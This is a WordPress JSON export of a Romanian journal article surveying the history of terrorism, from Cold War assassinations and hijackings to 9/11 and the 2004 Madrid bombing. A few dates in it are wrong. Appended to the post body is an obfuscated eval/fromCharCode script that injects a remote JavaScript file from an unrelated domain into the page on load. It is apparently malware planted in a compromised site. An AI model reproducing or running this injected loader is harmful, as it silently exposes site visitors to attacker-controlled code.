\u0163ar\u0103. C\u00e2nd a ajuns la\u00a0 Miami, dup\u0103 ce a \u0163inut un discurs, la Chicago, a plecat \u00eentr-un autoturism decapotabil. \u00cen acel moment, un necunoscut din mul\u0163ime a scos un pistol \u015fi a tras asupra ma\u015finii cinci cartu\u015fe.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Prima victim\u0103 a fost primarul ora\u015fului Chicago, aflat pe scara autoturismului, o femeie a fost lovit\u0103, iar al\u0163i doi b\u0103rba\u0163i \u00eempu\u015fca\u0163i \u00een cap. Asasinul a strigat: \u201dO s\u0103-i \u00eempu\u015fc pe to\u0163i pre\u015fedin\u0163ii\u201c. Teroristul a fost\u00a0 imobilizat \u015fi identificat \u00een persoana lui Joe Giuseppe Jangarra, care era un psihopat.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">De re\u0163inut\u00a0 faptul c\u0103 Pre\u015fedintele Roosvelt nu a fost r\u0103nit, el \u015fi-a continuat activitatea \u015fi a reu\u015fit s\u0103 contribuie la \u00eenfr\u00e2ngerea regimului de teroare al lui Hitler.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dup\u0103 \u00eenfr\u00e2ngerea regimului de teroare al dictaturii totalitare instaurate de Hitler \u00een Europa, lumea era \u00eemp\u0103r\u0163it\u0103 \u00een sfere de influen\u0163\u0103 ale puterilor: U.R.S.S., S.U.A, Fran\u0163a \u015fi Anglia. Lumea este \u00eemp\u0103r\u0163it\u0103 \u00een dou\u0103 blocuri cu ideologii opuse: capitalism \u015fi socialism, inaugur\u00e2ndu-se epoca\u00a0 \u201cr\u0103zboiului rece \u201c.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Fiecare bloc a \u00eencercat prin orice mijloace s\u0103-\u015fi ating\u0103 scopurile, apel\u00e2nd inclusiv la mijloace \u015fi metode teroriste.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Terorismul de extrem\u0103 st\u00e2ng\u0103 s-a extins \u00een Europa, Africa, Asia, America Latin\u0103, America de Nord \u015fi Vietnam.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen unele \u0163\u0103ri, a\u015fa cum s-a \u00eent\u00e2mplat \u00een Turcia, Italia, Guatemala, Argentina \u015fi Brazilia, au ac\u0163ionat grup\u0103ri teroriste apar\u0163in\u00e2nd extremei drepte.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen Grecia, \u00een perioada 1945-1949, a izbucnit un r\u0103zboi civil \u00eentre grup\u0103rile comuniste \u015fi for\u0163ele active \u00een r\u0103zboiul antihitlerist (instruite \u015fi dotate de britanici \u015fi na\u0163ionali\u015ftii eleni). P\u00e2n\u0103 la urm\u0103, grup\u0103rile comuniste au fost \u00eenvinse de for\u0163ele armate engleze. Conflictul a continuat, fiind promovat \u00een cadrul unei mi\u015fc\u0103ri de emancipare na\u0163ional\u0103 al c\u0103rui scop era unirea Ciprului cu Grecia. Actele teroriste sus\u0163inute de ciprio\u0163i au condus, \u00een perioada 1955-1959, la \u00eenregistrarea a 142 de mor\u0163i \u015fi 684 de r\u0103ni\u0163i, oblig\u00e2nd Marea Britanie s\u0103 renun\u0163e la prezen\u0163a \u00een Cipru.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Tot din cauza ac\u0163iunilor teroriste declan\u015fate, Marea Britanie a fost nevoit\u0103 s\u0103-\u015fi retrag\u0103, \u00een anul 1949, protectoratul asupra Palestinei, \u00een contextul \u00een care terori\u015ftii evrei fuseser\u0103 \u00eenarma\u0163i \u015fi instrui\u0163i de britanici.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Atacurile teroriste evreie\u015fti au fost opera organiza\u0163iilor teroriste evreie\u015fti Irgun \u015fi Stern, care urm\u0103reau alungarea britanicilor \u015fi \u00eenfiin\u0163area statului israelian.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen perioada 1948-1957, grup\u0103rile teroriste din Malaiezia au provocat, prin acte teroriste, mii de mor\u0163i \u015fi r\u0103ni\u0163i \u00een r\u00e2ndul trupelor britanice, reu\u015find s\u0103 ob\u0163in\u0103 independen\u0163a \u0163\u0103rii, controlat\u0103 de britanici.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dup\u0103 cel de-al doilea r\u0103zboi mondial \u015fi p\u00e2n\u0103 \u00een anul 1960 Fran\u0163a s-a confruntat cu multiple acte teroriste, \u00eendeosebi \u00een Tunisia (1952-1955) , Maroc (1953-1956) \u015fi Algeria.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">De exemplu, \u00een Algeria, din totalul popula\u0163iei, aproximativ 96% erau musulmani \u015fi 2% europeni (ace\u015ftia din urm\u0103 dominau \u00een Algeria). Astfel c\u0103, \u00een anul 1954, s-au \u00eenregistrat ciocniri \u00eentre popula\u0163ia arab\u0103 \u015fi popula\u0163ia colonial\u0103, care au degenerat \u00een acte de violen\u0163\u0103 comise \u00eempotriva popula\u0163iei franceze din Algeria. Fran\u0163a a reac\u0163ionat \u015fi avia\u0163ia francez\u0103 a mitraliat comunitatea arab\u0103 (aproximativ 45.000 de musulmani au fost uci\u015fi). Algeria a reac\u0163ionat prin Frontul de Eliberare Na\u0163ional\u0103 a Algeriei, care a declan\u015fat o serie de ac\u0163iuni violente, \u00eempotriva administra\u0163iei franceze, soldate cu\u00a0 masacrarea unor europeni (1035 persoane).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Pe timpul afl\u0103rii\u00a0 la conducerea U.R.S.S. a lui Stalin, au avut loc o serie de acte teroriste at\u00e2t pe teritoriul \u0163\u0103rii, c\u00e2t \u015fi \u00een exterior, pe teritoriul altor state (Republica Democrat\u0103 German\u0103, Ungaria, Cehoslovacia, Polonia). U.R.S.S. a \u00eencercat, prin toate metodele \u015fi mijloacele, inclusiv cele teroriste, s\u0103-\u015fi l\u0103rgeasc\u0103 sfera de influen\u0163\u0103 comunist\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen urma unor reu\u015fite istorice, \u00een unele \u0163\u0103ri (China, Cuba, Vietnam etc.) comuni\u015ftii \u015fi-au perfec\u0163ionat metodele teroriste.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">La 23 noiembrie 1963 a avut loc unul dintre cele mai deosebite acte teroriste, asasinarea lui John Fitzgerald Kennedy. \u00cen versiunea oficial\u0103, asasinarea pre\u015fedintelui Kennedy a avut loc \u00een timpul c\u00e2nd acesta se afla \u00eentr-o ma\u015fin\u0103 deschis\u0103, ce trecea prin Dallas. Acesta a fost \u00eempu\u015fcat de la fereastra unui depozit de manuale \u015fcolare, de c\u0103tre Lee Harvey Oswald, emigrant din U.R.S.S., cunoscut ca simpatizant al comunismului. Din nefericire, nici p\u00e2n\u0103 ast\u0103zi nu au fost descifrate secretele asasin\u0103rii pre\u015fedintelui Kennedy, Comisia Warren (dup\u0103 numele pre\u015fedintelui Cur\u0163ii Supreme) a str\u00e2ns probe \u015fi depozi\u0163ii \u00een 26 de volume.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Apari\u0163ia terorismului interna\u0163ional a fost determinat\u0103\u00a0 \u015fi de faptul c\u0103 U.R.S.S. \u015fi S.U.A nu doreau\u00a0 un conflict deschis cu consecin\u0163e grave (r\u0103zboi), motiv pentru care au recurs la folosirea mi\u015fc\u0103rilor subversive din \u0163\u0103rile \u0163int\u0103 \u015fi a actelor teroriste. La organizarea \u015fi desf\u0103\u015furarea acestor activit\u0103\u0163i o contribu\u0163ie important\u0103 \u015fi-au adus-o serviciile de informa\u0163ii \u015fi spionaj ale acestor \u0163\u0103ri.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen scopul promov\u0103rii terorismului interna\u0163ional \u00een Asia (\u00een Coreea de Nord) s-au \u00eenfiin\u0163at primele tabere ale terorismului interna\u0163ional.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Terorismul a fost promovat cu mult\u0103 intensitate \u00een Orientul Apropiat, \u00een Palestina. Israelul devine du\u015fmanul \u201cde moarte\u201d al arabilor \u00eenc\u0103 de la \u00eentemeierea sa, \u00een\u00a0 1948, pe p\u0103m\u00e2ntul Palestinei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Terorismul interna\u0163ional al anilor \u201980 \u2013 \u201990 a constituit un fenomen care s-a manifestat printr-o tendin\u0163\u0103 de unificare a terorismului de extrem\u0103 dreapt\u0103 cu cel de extrem\u0103 st\u00e2ng\u0103. A\u015fa de exemplu, Brig\u0103zile Ro\u015fii din Italia, la 9 mai 1978, l-au asasinat pe liderul democra\u0163iei cre\u015ftine Aldo Moro, care a fost de cinci ori prim ministru al Italiei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Motivul l-a constituit faptul c\u0103 Aldo Moro devenise partizanul \u201ecompromisului istoric\u201d cu partidul comunist, neacceptat \u00eens\u0103 de extremi\u015ftii de st\u00e2nga, care erau partizanii unui conflict deschis cu puterea. Asasinarea a avut loc dup\u0103 55 de zile, \u00een care Aldo Moro a fost \u0163inut ostatic, cadavrul fostului premier fiind g\u0103sit la Roma, \u00een portbagajul unei ma\u015fini.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cu privire la deturn\u0103rile de avioane de c\u0103tre organiza\u0163iile teroriste, se poate men\u0163iona deturnarea din luna iulie 1968 a zborului El Al Roma &#8211; Tel Aviv spre Alger de c\u0103tre trei terori\u015fti ai Frontului Popular pentru Eliberarea Palestinei. Guvernul algerian a ob\u0163inut de la terori\u015fti abandonarea avionului contra unui acord israelian privind eliberarea a 16 arabi, care se infiltraser\u0103 \u00een Israel \u00een timpul r\u0103zboiului de \u015fase zile.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>2. Terorismul la \u00eenceputul mileniului trei<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Sf\u00e2r\u015fitul secolului XX a debutat cu pr\u0103bu\u015firea comunismului ca sistem totalitar. Echilibrul reprezentat de supraputerile S.U.A. \u015fi U.R.S.S. s-a rupt \u00een favoarea S.U.A, aceasta devenind unica superputere a lumii.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">A c\u0103p\u0103tat accente deosebite mai ales \u00eencercarea\u00a0 terori\u015ftilor de a impune fundamentalismul islamic, \u00een lupta dintre islam \u015fi cre\u015ftinism, dintre arabi \u015fi americani.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Printre cele mai s\u00e2ngeroase acte teroriste le enumer\u0103m pe urm\u0103toarele:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 atacul\u00a0 terorist cu un automobil capcan\u0103, produs la 26 februarie 1993, \u00eentr-o parcare din New York, rezultatul final fiind 6 mor\u0163i \u015fi 1.042 r\u0103ni\u0163i;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 explozia unui automobil capcan\u0103 din 13 noiembrie 1995 de la Riad, \u00een care au murit 5 americani, 25 indieni, fiind r\u0103nite 60 de persoane , din care 34 americani;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 explozia unui automobil-capcan\u0103 din 25 iunie 1996, de la Cartierul General al Avia\u0163iei americane de la Khobar, \u00een Arabia Saudit\u0103, soldat cu uciderea a 19 militari \u015fi r\u0103nirea a peste 300;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 masacrarea de c\u0103tre un comando, alc\u0103tuit din 5 terori\u015fti islami\u015fti, la data de 17 noiembrie 1997, la Luxor, \u00een Egipt, a 50 de turi\u015fti \u015fi 4\u00a0 egipteni. Terori\u015ftii au mutilat oribil 20 de turi\u015fti, dup\u0103 care i-au omor\u00e2t;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 atacul, prin exploziile succesive a dou\u0103 bombe, \u00een anul 1998, asupra ambasadelor americane de la Nairobi (Kenya) \u015fi Dar es Salam (Tanzania). Actele teroriste s-au soldat cu uciderea: la Nairobi a 247 de persoane(12 americani) \u015fi peste 4.500 de r\u0103ni\u0163i; la Dar es Salam cu uciderea a 11 persoane \u015fi r\u0103nirea a peste 100 .<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">La originea acestor acte teroriste a fost organiza\u0163ia Al &#8211; Qaida.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen fosta Iugoslavie, \u00een Cecenia \u015fi Afganistan au avut loc acte teroriste soldate cu mii de victime.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dup\u0103 anul 1989, \u00een spa\u0163iul ex-iugoslav au ap\u0103rut acte de terorism, care sunt \u00eenc\u0103 judecate de Tribunalul interna\u0163ional pentru fosta Iugoslavie.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Terorismul se manifest\u0103 \u015fi \u00een spa\u0163iul ex-sovietic, ca urmare a dezmembr\u0103rii fostei Uniuni Sovietice, mi\u015fcarea separati\u015ftilor ceceni fiind reprezentativ\u0103 \u00een acest sens.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cel mai agresiv terorism, permanentizat, se manifest\u0103 \u00een Orientul Mijlociu, \u00een spa\u0163iul israeliano-palestinian, fiind generat de lupta de aproape o jum\u0103tate de secol a poporului palestinian pentru crearea propriului stat.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dar \u00een ciuda tuturor precedentelor istorice, terorismul, a\u015fa cum se exercit\u0103 \u015fi la \u00eenceputul mileniului trei, este \u00een mare m\u0103sur\u0103 o activitate specific\u0103 zilelor noastre.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Se poate afirma c\u0103 progresele tehnologice \u015fi interdependen\u0163a mondial\u0103 cresc\u00e2nd\u0103 au conferit terori\u015ftilor o mobilitate nou\u0103, obiective \u015fi arsenale noi, precum \u015fi perspectiva sigur\u0103 \u015fi apropiat\u0103, c\u0103 ac\u0163iunile lor spectaculoase se vor bucura ne\u00eent\u00e2rziat de o publicitate mondial\u0103. Mai mult, schimb\u0103rile din ultimii ani \u00een climatul politic \u015fi economic au creat un mediu ceva mai prielnic opera\u0163iunilor de natur\u0103 terorist\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00centr-adev\u0103r,\u00a0 \u00een ultimii ani s-a \u00eenregistrat o ascensiune at\u00e2t de pronun\u0163at\u0103 a actelor teroriste, \u00eenc\u00e2t unii speciali\u015fti au avertizat c\u0103 ar fi posibil s\u0103 ne afl\u0103m la \u00eenceputul unei adev\u0103rate ere a terorismului. Printre altele, s-a constatat o cre\u015ftere \u00eensemnat\u0103 a num\u0103rului de grup\u0103ri teroriste active, ca \u015fi a num\u0103rului de \u0163\u0103ri \u00een care opereaz\u0103. De asemenea, cooperarea intern\u0103 \u015fi interna\u0163ional\u0103 dintre grup\u0103rile teroriste a crescut substan\u0163ial.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Evenimentele deosebit de grave produse \u00een Statele Unite ale Americii \u00een 11 septembrie 2001 \u015fi cele care au avut loc ulterior \u00een Anglia \u015fi \u00een alte \u0163\u0103ri au marcat profund evolu\u0163ia societ\u0103\u0163ii umane contemporane, demonstr\u00e2nd c\u0103 terorismul interna\u0163ional a devenit ast\u0103zi un fenomen amenin\u0163\u0103tor la adresa securit\u0103\u0163ii mondiale \u015fi de sfidare a p\u0103cii \u015fi a democra\u0163iei, a vie\u0163ii \u015fi libert\u0103\u0163ii persoanei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">La 11 septembrie 2001, 18 terori\u015fti sinuciga\u015fi, printr-o ac\u0163iune conjugat\u0103, pun st\u0103p\u00e2nire pe patru avioane civile americane ce efectuau zboruri pe rute interne, cu mul\u0163i pasageri la bord. Dou\u0103 dintre aceste avioane sunt \u201ecatapultate\u201d de terori\u015fti, la 20 de minute\u00a0 unul dup\u0103 altul, \u00een cele dou\u0103 turnuri de la World Trade Center din New York, care se pr\u0103bu\u015fesc pe r\u00e2nd \u00een \u201egol\u201d. Apoi, \u00eentr-un interval de aproximativ 30 de minute de la pr\u0103bu\u015firea celui de-al doilea Turn, un alt avion a lovit Pentagonul. Al patrulea avion deturnat, care se \u00eendrepta probabil spre Casa Alb\u0103, s-a pr\u0103bu\u015fit \u00een Pennsylvania.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Masacrul s-a soldat cu 3.000 de victime omene\u015fti din peste 60 de \u0163\u0103ri ale lumii. Ca suspect nr.1 a fost Ossama bin Laden, prin Organiza\u0163ia Al Qaeda.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cu toate m\u0103surile luate ulterior, bombardamentele americane \u00een Afganistan, \u00eendep\u0103rtarea talibanilor de la putere, Ossama bin Laden nu a fost prins. \u00cen luna martie 2003, S.U.A. a atacat Irakul (f\u0103r\u0103 nici o legitimitate), ignor\u00e2nd rolul ONU \u015fi opozi\u0163ia Fran\u0163ei \u015fi Germaniei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Acest r\u0103zboi purtat de S.U.A. \u015fi aliatul s\u0103u fidel, Marea Britanie, a fost \u00een primul r\u00e2nd un r\u0103zboi \u00eempotriva dictatorului Saddam Hussein \u015fi a crimelor pe care acesta le-a comis \u00eempotriva poporului irakian, precum \u015fi r\u0103zboiul cu Iranul, \u00een perioada\u00a0 \u201980 \u2013 \u201990, sau anexarea Kuweitului, \u00een anul 1990.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Un alt atentat terorist dup\u0103 11 septembrie a fost cel din 11 martie 2004, la Madrid (Spania). \u00cen gara Atocha, \u00een patru trenuri pline cu\u00a0 c\u0103l\u0103tori au explodat patru bombe. Evenimentul terorist s-a soldat cu 190 de mor\u0163i (printre care \u015fi 16 rom\u00e2ni) \u015fi 1.900 r\u0103ni\u0163i. Atentatul a fost atribuit tot organiza\u0163iei Al Qaeda.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen concluzie, trebuie s\u0103 preciz\u0103m c\u0103 periculozitatea terorismului este pus\u0103 c\u00e2t se poate de clar \u00een eviden\u0163\u0103, chiar de principalele sale caracteristici, astfel:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 terorismul interna\u0163ional se prezint\u0103 sub forma unei multitudini de acte criminale: asasinate sau omucideri, r\u0103piri, extorc\u0103ri, incendieri,distrugeri sau asociere de alte acte, care sunt considerate de toate na\u0163iunile drept criminale;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 terorismul interna\u0163ional este de obicei motivat politic. Un grup politic extremist , convins de juste\u0163ea cauzei sale, recurge la mijloace violente pentru a o sus\u0163ine, mijloace care \u00eencorporeaz\u0103 unul din actele men\u0163ionate. Deseori,violen\u0163a se exercit\u0103 asupra unor oameni nevinova\u0163i, persoane care nu au nicio leg\u0103tur\u0103 cu motivarea actului terorist;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u2022\u00a0\u00a0\u00a0\u00a0\u00a0 terorismul contemporan dep\u0103\u015fe\u015fte grani\u0163ele na\u0163ionale prin alegerea unei \u0163inte sau a unor victime str\u0103ine, prin comiterea actului terorist \u00eentr-o \u0163ar\u0103 str\u0103in\u0103 sau prin efortul depus pentru influen\u0163area politicii unui guvern str\u0103in.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>BIBLIOGRAFIE<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">1.\u00a0\u00a0\u00a0 Dumitru Virgil Diaconu, Terorismul. Repere juridice si istorice,\u201c\u00a0 Editura All Beck , Bucure\u015fti, 2004.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">2.\u00a0\u00a0\u00a0 Nicolae Toma, Consideratii privind reprimarea terorismului international, Serviciul Editorial al Ministerului de Interne,1979.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">3.\u00a0\u00a0\u00a0 Prof. univ. dr. Anghel Andreescu, dr. Ilie Popescu, col. (r) Nicolae Radulescu, subcomisar Nicolae Popescu, Terorismul international, flagel al lumii contemporane, Editura Ministerului Administra\u0163iei \u015fi Internelor, 2003.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">4.\u00a0\u00a0\u00a0 Gh. Ar\u0103d\u0103voaice, D. Iliescu, Dan Ni\u0163\u0103,\u00a0 Terorism, Antiterorism, Contraterorism, Editura Antet, Oradea, 1997.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">5.\u00a0\u00a0\u00a0 Dr. I. Bodunescu, Flagelul terorismului international, Bucure\u015fti, Editura Militar\u0103, 1978.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">6.\u00a0\u00a0\u00a0 Vasile L\u0103p\u0103du\u015fi, dr. Gh. Popa, Investigarea Criminalistic\u0103 a locului faptei \u2013 note de curs, Editura Luceaf\u0103rul, 2005.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">7.\u00a0\u00a0\u00a0 Dr. Tudor Amza, Criminologie teoretic\u0103, Editura Lumina Lex, Bucure\u015fti, 2000.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">8.\u00a0\u00a0\u00a0 V. Duculescu, Protectia juridica a drepturilor omului, Editura Lumina Lex, Bucure\u015fti, 1998.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">9.\u00a0\u00a0\u00a0 Frederich Naeker, Terroeur et terrorism, Flamarion, Paris, 1976.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">10.\u00a0 M. Ferchedau \u2013 Muntean and others, Terorismul &#8211; istoric, forme, combatere. Culegere de studii, Editura Omega, 2001.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">11.\u00a0 Jean Luc Marret, Tehnicile terorismului, Editura Corint, Bucure\u015fti, 2002<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">12.\u00a0 Cotidianul\u00a0 Adev\u0103rul din 8 octombrie \u015fi 8 noiembrie, 2003; 10 februarie \u015fi 6 mai, 2004.<\/span><\/p>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>TERRORISM \u2013 HISTORICAL BENCHMARK Abstract This article briefly presents aspects regarding the appearance and evolution of the terrorist acts. In the configuration of international criminality, important mutations took place throughout time, especially materialized in the revival of terrorism in its most violent forms. During the last years such a pronounced ascension of the terrorist acts [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[26,84],"tags":[138],"_links":{"self":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/505"}],"collection":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/comments?post=505"}],"version-history":[{"count":1,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/505\/revisions"}],"predecessor-version":[{"id":506,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/posts\/505\/revisions\/506"}],"wp:attachment":[{"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/media?parent=505"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/categories?post=505"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aafdutm.ro\/revista\/wp-json\/wp\/v2\/tags?post=505"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}